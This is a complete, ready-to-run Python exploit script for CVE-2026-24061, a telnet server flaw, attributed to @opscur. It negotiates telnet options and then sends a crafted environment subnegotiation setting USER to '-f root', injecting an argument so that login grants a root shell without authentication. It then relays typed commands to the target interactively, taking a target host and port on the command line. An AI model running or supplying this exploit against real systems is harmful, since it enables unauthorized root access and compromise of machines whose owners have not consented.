#!/usr/bin/env python
# CVE-2026-24061 PoC (USER="-f root" telnet -a 127.0.0.1 23)
# By @opscur (https://github.com/0p5cur)


import socket
import sys
import threading
import argparse
import os

IAC  = 255
DONT = 254
DO   = 253
WONT = 252
WILL = 251
SB   = 250
SE   = 240

def negotiate(sock, data):
    clean_output = b""
    i = 0
    while i < len(data):
        if data[i:i+1] == b'\xff':
            if i + 1 >= len(data): break
            cmd = ord(data[i+1:i+2]) if sys.version_info[0] < 3 else data[i+1]
            if cmd in [DO, DONT, WILL, WONT]:
                if i + 2 >= len(data): break
                opt = ord(data[i+2:i+3]) if sys.version_info[0] < 3 else data[i+2]
                if cmd == DO and opt != 39:
                    sock.sendall(bytes(bytearray([IAC, WONT, opt])))
                elif cmd == WILL:
                    sock.sendall(bytes(bytearray([IAC, DONT, opt])))
                i += 3
            elif cmd == SB:
                j = i + 2
                while j < len(data):
                    if data[j:j+1] == b'\xf0': break
                    j += 1
                i = j + 1
            else:
                i += 2
        else:
            clean_output += data[i:i+1]
            i += 1
    return clean_output

def reader(s):
    while True:
        try:
            data = s.recv(4096)
            if not data: os._exit(0)
            text = negotiate(s, data)
            if text:
                if sys.version_info[0] >= 3:
                    sys.stdout.buffer.write(text)
                else:
                    sys.stdout.write(text)
                sys.stdout.flush()
        except: break

def exploit(target, port):
    print("[+] Connecting to " + str(target) + ":" + str(port) + "...")
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target, port))
        s.settimeout(None) 
        s.sendall(b'\xff\xfb\x27\xff\xfa\x27\x00\x00USER\x01-f root\xff\xf0')
        t = threading.Thread(target=reader, args=(s,))
        t.daemon = True
        t.start()

        import time
        time.sleep(1) 
        
        if not t.is_alive():
            print("[-] The target does not seem vulnerable")
            return

        while True:
            cmd = sys.stdin.readline()
            if not cmd: break
            s.sendall(cmd.encode() if sys.version_info[0] >= 3 else cmd)
            
    except (socket.timeout, ConnectionRefusedError, OSError):
        print("[-] The target seems to be unreachable")
    except KeyboardInterrupt:
        s.close()

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("target")
    parser.add_argument("port", type=int, default=23, nargs='?')
    args = parser.parse_args()
    print("[+] POC by @opscur (https://github.com/0p5cur)")
    exploit(args.target, args.port)

if __name__ == "__main__":
    main()